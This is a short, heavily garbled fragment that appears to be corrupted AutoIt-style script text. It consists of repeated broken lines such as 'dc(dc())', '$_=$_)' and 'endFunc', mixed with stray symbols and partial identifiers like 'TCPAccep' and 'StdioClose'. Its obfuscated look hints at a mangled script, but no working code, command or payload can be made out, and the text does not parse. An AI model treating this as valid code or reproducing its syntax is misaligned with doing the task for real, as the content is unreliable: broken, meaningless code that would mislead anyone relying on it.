wh≠≠$p="",$N?"",$u="",$≠≠≠≠≠n[
dc(dc())
dc($_
$_=0
$_=$_)
dc((HdFunc
dc(dc())
dc)
d≠≠≠≠$pdc$p="")
endF
dc(dc()())
dc($_
$_=3
$_=$_)
dc((Hd)c),$N="",$u="",$p=dc($="",u="",$p≠≠≠≠≠≠≠="",$p=dc($≠≠≠≠≠≠≠yTo$_
$_=2
$_=$Str$p="",$p="",chr(Exp(int(chr()),$p"=)"
e0
$_=$_)
dc((Hd,$N="",$
dc($_
$_=3
$_=$_)
dc((Hd)c),$N="",$u="",$p=dc($)
e0
$_=$_)
dc((Hd,$N="",$
dc($_
$_=3
$_=$_)
du="",$p=""≠≠≠,$p=dc($≠≠≠≠≠≠≠yTo._
$_=2
$_=$Stringfuncúd"",$+TruN?"",$u="",$≠á≠≠≠≠n[
dc(dc())
dc($_
$_=0
$_=$_)
dc((µõ÷ú÷”€±="",$u="",$p=dc($v="""",$p="")
endFunc
dc(dc())
d+T≠≠$pdc$p="")
endF
dc(dc()())
dc($X
$_=4
$StdioClose_=$u="",$p=dc($v="""",$p=""TCPAccep="",$p="",$+TruN?"",$u="",$≠á≠≠≠≠n[
dc(dc())
dc($_
$_=0
$_=$_)
dc((Hd)c),$N=""ˇ,$u="",$p=dc($v="""",$p="")
endFunc
dc(dc())
d+T≠≠$pdc$p="")
endF
dc(dc()())
dc($X
$_=3
$_=$_)
dc((Hd)c),$N"=",$u="",$p=dc($v="",u="",$p=""≠≠≠≠≠$_=$_)
dc((Hd)c),,""$=N$u="",$p=dc($v="""",$p="")
endFunc
dc(dc())
d+T≠≠$pdc$p="")
endF
dc(dc()())
dc($X
$_=1
$_=$_)
dc((Hd)c),$N"=",$u="",$p=dc($v=≠≠≠≠≠≠≠≠≠≠≠≠≠="",$p=dc($≠≠≠≠≠≠≠yTo$_
$_=2
$_=$Stringfuncúdc($v="",u="",$p="",chr(Exp(int$p="")
endFun{
dc(dc())
dc($_
$_=5
$_=$_)
dc((Hd)c),$N=""